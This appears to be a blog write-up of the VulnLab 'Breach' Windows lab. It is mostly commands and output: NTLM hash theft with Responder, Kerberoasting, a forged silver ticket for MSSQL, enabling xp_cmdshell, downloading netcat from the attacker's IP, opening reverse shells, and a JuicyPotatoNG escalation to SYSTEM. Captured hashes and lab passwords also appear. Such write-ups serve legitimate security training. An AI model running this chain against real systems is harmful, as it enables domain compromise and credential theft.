vulnlab-breach

vulnlab breach

a Medium Windows machine

tools used : ntlm_theft.py , impacket-getPac , impacket-GetUserSPNs , ldapdomaindump , impacket-mssqlclient , JuicyPotatoNG.exe

.

we  create a bunch of files which will lead to a NTLMv2 hash stealing attack using this tool: https://github.com/Greenwolf/ntlm_theft

python ntlm_theft.py -g all -s 10.10.97.69 -f puckie

.

┌──(puck㉿kali)-[~/vulnlab/breach]
sudo responder -I tun0

                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx


[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.8.2.138]
    Responder IPv6             [fe80::e718:d192:5032:1452]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-88BT76XF41N]
    Responder Domain Name      [FBHG.LOCAL]
    Responder DCE-RPC Port     [49865]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.97.69
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:1fa52157fd1fca3b:2A0E8B36B448C002767DE27807FE3F48:0101000000000000005034B29DB8DA01623247E1694337960000000002000800460042004800470001001E00570049004E002D0038003800420054003700360058004600340031004E0004003400570049004E002D0038003800420054003700360058004600340031004E002E0046004200480047002E004C004F00430041004C000300140046004200480047002E004C004F00430041004C000500140046004200480047002E004C004F00430041004C0007000800005034B29DB8DA010600040002000000080030003000000000000000010000000020000007196E9E493DFA17295C160C4781E2F23F634A0B97A48BF7DEF201FA24F1CE0E0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E0038002E0032002E003100330038000000000000000000
[*] Skipping previously captured hash for BREACH\Julia.Wong

as Julia.Wong

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-getPac -targetUser administrator breach.vl/julia.wong:Computer1       
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

KERB_VALIDATION_INFO 
LogonTime:                      
    dwLowDateTime:                   2560514102 
    dwHighDateTime:                  30942228 
LogoffTime:                     
--snip--

Domain SID: S-1-5-21-2330692793-3312915120-706255856

 0000   10 00 00 00 F5 18 12 7A  3C 36 13 6A 18 C4 BD 3F   .......z<6.j...?
                                                                                                                     

 

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-GetUserSPNs breach.vl/julia.wong:Computer1 -dc-ip 10.10.97.69 -request 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName              Name       MemberOf  PasswordLastSet             LastLogon                   Delegation 
--------------------------------  ---------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/breachdc.breach.vl:1433  svc_mssql            2022-02-17 05:43:08.106169  2024-06-07 05:23:44.260778             



$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$a497b878287c08cf634ef3530131743b$a6211db7cc5fb5d31bc2338c501b4b7e990dc8cee0c416b2c0d89de679cc95a7ab289f018a43a37c113e2d99b058d51b50ab4fc5c10b3dc54451444f0e129b435d4d7a7302feb22e19e6983fa6493c83ce6910341a4f1e2b6404565a2f272b09b1511faead8cd5e2bfb82ca51b20b8170147af1aa262b62c95f32b8f5e43cedd5a9e76239d33f87be790624c2a2077cf7b2f5a2aecd3d6e9105321a4d150ea3ffbfb4ee7e4a4c9cf45a056ff7df8f6732f08f45d4c5bcfa4f747078ad5ffa29ac4a68950379570e53ddead20f5320635f2b111f39c81e655086451a078db3a0a3159fe2a4289a57ddde3e65b04b3d2942a3d79a95c8a0dca50c5cfe93e52610256c4a069ba51318584e7d0ccbaee4bfeffce4f9aff6b415276f5ee88ebe9623ebeefaf73da42b5239b3fd1b62fa581556d427ec512df3798042a17e062eea1d676be04735fda3d0043705d4f1f9ca87612230b42cad9bfd867f58cba6c26c06332dde93c81f29ddc039ec5a35269a1f003148fac2ffca4a3f7f2b316fcd59401c9b68cabd231aeebb08f41800c9ab7811562eca1c23ac4def78e18af008ce98e8351f1d3afb437f2f325d645e5bfc7177184018cc00e0fed69c375a91887d02e0f4f1e7a025164431f28a922494acca4b4e36d3d6684e7137879d692117b01bd7c27adff6783e887c06a8841f3a8148fbf419805d967a1716693370d5b442bce99756c58bdcdff1f4be584b525cddf4bba0c0e9f82e0f92199b30854306036db6ff868eb5bfe186b30de5afd07837977f3aa462dff42ad1ce63fa743fdbcc267ad45d65adbdd3e30d9f310860a987cbb1aea8ef9eab1f5752a9a3e686c1d3d503fc006e5df3a49c53d2ab3c45e80f78cd5eba2a72530966e1d15d097fb2700150e3eabb451d3cebf1c7abbcc06c02ef06757f59ec2038761610cd6b25ea83ae019f3805fc31ae3cbd9ea9ed193f622b175f2fe2e737e6fed9be29d31f4947a4ec24be9a9f79af713f991ae842010a7079821e76af8ced756f1e2c83370d1940ec99fff26394e01d17cadef7551b053d7b998ca62c1f1f83cd9a3aa6db9eb6dde4a68fe19f2ac49d3efc4f93bebf3f62cf41fa1d1f5c01fa0978a4c1f7c4774482bb4469b00cd59f782ffef40e09cff227614e6c5a807322302be2cc0f4f28492d95a724b561a21884ac94066d8fe8a82ebdf8a51a590b2635a3be34c00170d55815fa286ccdf8ed7c04c0914090ed7e9a39666d5d6533f6b20846b8a398706ec251064d76960f7af521f9a77439585bb2ba2f6397b7bacbdb1ac81bdcd2ee6bbf3c3005923890c538d9c7ba3ccca2984901ed7a696e02a8e1ab6e64aef3f487f1cf118c3714085ac652f9f202e747b501eaa981644639d59bed8d9891fdc407a23faf797239454d948d5290376271e091621b11bd16ee5ecb5cdd80d73a5bf2fdbd60b739c265fd8a4b22e606b86865f3ebffa9c
                                                                                                                     

Getting more users

┌──(puck㉿kali)-[~/vulnlab/breach]
ldapdomaindump breach.vl -u 'breach\Julia.Wong' -p 'Computer1'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
                                                                                                                     
cat domain_users.grep | grep svc 
svc_mssql svc_mssql svc_mssql Domain Users 02/17/22 10:43:07 06/07/24 13:34:45 06/07/24 13:34:45 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 02/17/22 10:43:08 S-1-5-21-2330692793-3312915120-706255856-1115

bloodhound-python -d breach.vl -u 'Julia.Wong' -p 'Computer1' -c all -ns 10.10.97.69 

Silver ticket create with the NTLM hash of the svc_mysql user:

In order to perform a silver ticket attack we require the Domain SID , User NTLM hash & User SPN

┌──(puck㉿kali)-[~/vulnlab/breach]
iconv -f ASCII -t UTF-16LE <(printf "Trustno1") | openssl dgst -md4 
MD4(stdin)= 69596c7aa1e8daee17f8e78870e25a5c


impacket-ticketer -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip breachdc -spn MSSQLSvc/breachdc.breach.vl:1433 administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in administrator.ccache
                                                                                                                     
export KRB5CCNAME=administrator.ccache

.

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-mssqlclient -k breachdc.breach.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (BREACH\Administrator  dbo@master)> 

.

 

SQL stuff

SQL (BREACH\Administrator  dbo@master)> sp_configure 'show advanced options', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)> RECONFIGURE
SQL (BREACH\Administrator  dbo@master)> sp_configure 'xp_cmdshell', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)> RECONFIGURE
SQL (BREACH\Administrator  dbo@master)> xp_cmdshell dir "C:\"
output                                                       
----------------------------------------------------------   
 Volume in drive C has no label.                             

 Volume Serial Number is B465-02B6                           

NULL                                                         

 Directory of C:\                                            

NULL                                                         

08/19/2021  06:24 AM    <DIR>          EFI                   

02/17/2022  09:55 AM    <DIR>          inetpub               

05/08/2021  08:20 AM    <DIR>          PerfLogs              

02/17/2022  10:28 AM    <DIR>          Program Files         

02/17/2022  10:27 AM    <DIR>          Program Files (x86)   

02/17/2022  02:11 PM    <DIR>          share                 

02/17/2022  01:12 PM    <DIR>          Users                 

02/17/2022  03:35 PM    <DIR>          Windows               

               0 File(s)              0 bytes                

               8 Dir(s)  11,722,678,272 bytes free           

NULL                                                       

                         

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell powershell -c "wget -usebasicparsing http://10.8.2.138:8000/nc64.exe -o C:\Temp\nc64.exe"
output   
------   
NULL     

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell dir "C:\Temp"
output                                               
--------------------------------------------------   
 Volume in drive C has no label.                     

 Volume Serial Number is B465-02B6                   

NULL                                                 

 Directory of C:\Temp                                

NULL                                                 

06/07/2024  10:34 AM    <DIR>          .             

06/07/2024  10:34 AM            45,272 nc64.exe      

               1 File(s)         45,272 bytes        

               1 Dir(s)  11,754,811,392 bytes free   

NULL                                                 

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell powershell -c "C:\Temp\nc64.exe -e cmd 10.8.2.138 4444"


 

 

.

 

Privesc with JuicyPotatoNG

┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ nc -nlvp 4444 
listening on [any] 4444 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 59869
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
breach\svc_mssql

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name        SID                                          
================ =============================================
breach\svc_mssql S-1-5-21-2330692793-3312915120-706255856-1115


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                                             Attributes                                        
========================================== ================ =============================================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                                    Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6                                                         Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                                        Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS                Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner    
LOCAL                                      Well-known group S-1-2-0                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                                                                      


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

C:\Windows\system32>cd c:\temp
cd c:\temp

c:\Temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Temp> wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
PS C:\Temp> dir
dir

    Directory: C:\Temp

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          6/7/2024  11:08 AM         153600 JuicyPotatoNG.exe                                                    
-a----          6/7/2024  10:34 AM          45272 nc64.exe                                                             


PS C:\Temp> .\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
.\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
PS C:\Temp>

.

┌──(puck㉿kali)-[~/vulnlab/breach]
rlwrap nc -nlvp 445
listening on [any] 445 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 64454
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\>whoami
whoami
nt authority\system

c:\Users\Administrator\Desktop>hostname
hostname
BREACHDC


 

.

 

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *